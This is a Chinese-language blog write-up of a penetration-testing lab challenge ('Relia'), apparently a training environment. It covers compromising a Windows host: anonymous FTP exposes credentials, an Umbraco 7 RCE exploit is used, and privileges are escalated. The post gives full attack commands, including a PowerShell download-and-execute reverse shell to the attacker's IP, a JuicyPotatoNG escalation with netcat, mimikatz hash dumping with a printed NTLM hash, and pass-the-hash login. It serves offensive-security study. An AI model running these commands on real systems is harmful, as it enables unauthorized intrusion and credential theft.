Challenge 2 - Relia(3)
Challenge 2 - Relia(3)
目前進度拿下外網兩台 Linux .245 & .246,還沒有看到任何可以進到內網的機器(具備雙網卡)
接下來的目標是外網 .247 這一台
第一步一樣先 Rustscan,└─$ rustscan -a 192.168.158.247 --scripts none --ulimit 5000 | tee rustscan
檢查 snmp,└─$ sudo nmap -sU -p 161 192.168.158.247 | tee snmp
nmap 掃描,└─$ sudo nmap -sCV -A -p 80,135,139,443,445,5985,14020,14080,47001,49664,49665,49666,49667,49668,49669,49670 192.168.158.247 | tee nmap
80/tcp open http Apache httpd 2.4.54 ((Win64) OpenSSL/1.1.1p PHP/8.1.10)
443/tcp open ssl/http Apache httpd 2.4.54 ((Win64) OpenSSL/1.1.1p PHP/8.1.10)
14020/tcp open ftp FileZilla ftpd
14080/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
nmap 檢查發現 FTP 可以匿名登入且有個 PDF 檔案,登入 FTP 將檔案抓回來
└─$ ftp 192.168.158.247 -P 14020
順便測試可否上傳檔案,結果是失敗,接著測試 FTP 目錄列舉一樣失敗
FTP 測試 ftp:ftp、admin:admin 登入失敗
開啟 PDF 發現是安裝 Umbraco 7 軟體的 SOP 步驟
獲得幾個資訊如下,伺服器看來叫做 WEB02,前端用 ASP.NET 後端有 DB
安裝的帳號密碼是 mark@relia.com:OathDeeplyReprieve91
Umbraco 看來是一套 Open Source CMS
先記錄到帳號密碼表
這一台 .247 Windows 有開 445 Port,拿到帳號密碼一定要測試一下看看
└─$ crackmapexec smb 192.168.158.247 -u mark -p OathDeeplyReprieve91
使用帶驗證的 enum4linux 列舉相關資訊,└─$ enum4linux -u mark -p OathDeeplyReprieve91 -a 192.168.158.247 | tee enum4linux
隨手好習慣,更新帳號密碼列表
SMB 分享沒有特別的目錄
使用 smbclient 再確認一次也是一樣,└─$ smbclient -L //192.168.158.247/ -U 'WEB02\mark' --password=OathDeeplyReprieve91
evil-winrm 測試無法登入,└─$ evil-winrm -i 192.168.158.247 -u mark -p OathDeeplyReprieve91
下一步開啟瀏覽器看看 Web,80 /
80 /robots.txt
探勘網站目錄,└─$ gobuster -w ./dirfuzzing.txt dir -u http://192.168.158.247 -c -t 150 -x txt,pdf,git,aspx | tee gobuster
80 /dashboard,看來 80 是 XAMPP 架設的公司網站,與看到的 Umbraco ASP.NET 不同站台
phpmyadmin 無法連線,phpinfo 沒有特別有用的資訊
80 /pdfs
443 / 看來一樣
gobuster https 第一層看來是一樣,暫時先跳過繼續往下看看其他 Port
其他 Port 測試後也都沒有 Web 網站也沒有發現 Umbraco CMS
原本打算放棄望下一台走前,再次 Review 整個過程,注意到這一句話
IIS is configured to only allow access to Umbraco using the server FQDN at the moment.
寫一筆 static record "web02.relia.com" 到 kali hosts file
測試相關的 IIS Port 帶 FQDN,在 14080 Port 上開啟了 Umbraco 網站
http://web02.relia.com:14080/
逛 CMS 網站前就是先查找看看有無 Exploit 是最優先的,看到版本一致又是 RCE
看一下 46153 看來要自己輸入帳號密碼與網站資訊
修改後執行看來有點問題,等等再來 debug
先看看 49488,這個看來方便多了 usage 直接帶參數即可
依據 usage 帶著參數操作看看,python 49488.py -u mark@relia.com -p OathDeeplyReprieve91 -i 'http://web02.relia.com:14080' -c ipconfig
看來成功了,確認是這一台 .247 的 IP 資訊
whoami 看一下也是成功的
先建立最愛的 Powershell oneliner
使用 python3 49488.py -u mark@relia.com -p OathDeeplyReprieve91 -i 'http://web02.relia.com:14080' -c powershell -enc <powershell-oneliner>......GG
python3 49488.py -u mark@relia.com -p OathDeeplyReprieve91 -i 'http://web02.relia.com:14080' -c powershell -c "-enc <powershell-oneliner>"..........GG,-c 參數重複
python3 49488.py -u mark@relia.com -p OathDeeplyReprieve91 -i 'http://web02.relia.com:14080' -c powershell -a "-enc <powershell-onliner>"...........成功了
4444 Reverse shell 也進來了
另外一種方式搜尋 Google Gihub 找到這個,參考 : https://github.com/Jonoans/Umbraco-RCE
下載 exploit.py 跟 exploit.cs 到同一個路徑
使用└─$ python3 exploit.py -u mark@relia.com -p OathDeeplyReprieve91 -w 'http://web02.relia.com:14080/' -i 192.168.45.153,直接拿到 shell 了
不過指令輸入後輸出都看不到東西,這個 exploit 會建立 4444 & 4445 Listener
輸入 IEX (New-Object System.Net.Webclient).DownloadString("http://192.168.45.153/tools/powercat.ps1");powercat -c 192.168.45.153 -p 4446 -e powershell 再建一個 Reverse Shell,這個就正常多了
flag 直接放在 C:\ 根目錄下
先 systeminfo 看一下,這一台沒有加入網域
C:\users 與 net user 確認只有 mark & zachary 兩個一般帳號
開始 PE,whoami /priv 發現 SeImpersonatePrivilege Enabled
標準作業,上傳 nc64.exe、JuicyPotatoNG.exe,執行 .\JuicyPotatoNG.exe -t * -p nc64.exe -a "192.168.45.153 4445 -e c:\windows\system32\cmd.exe"
4445 Listener 進來了,whoami 確認是管理者,直接拿 flag 吧
接著執行 mimikatz.exe 收集 NTLM HASH
administrator:2f2b8d5d4d756a2c72c554580f970c14
測試後沒問題可以成功登入,└─$ impacket-psexec -hashes :2f2b8d5d4d756a2c72c554580f970c14 administrator@192.168.158.247
mimikatz dump sam:system 獲得 mark、zachary 的 HASH
更新帳號密碼表如下
攻擊順序表更新如下
留言
張貼留言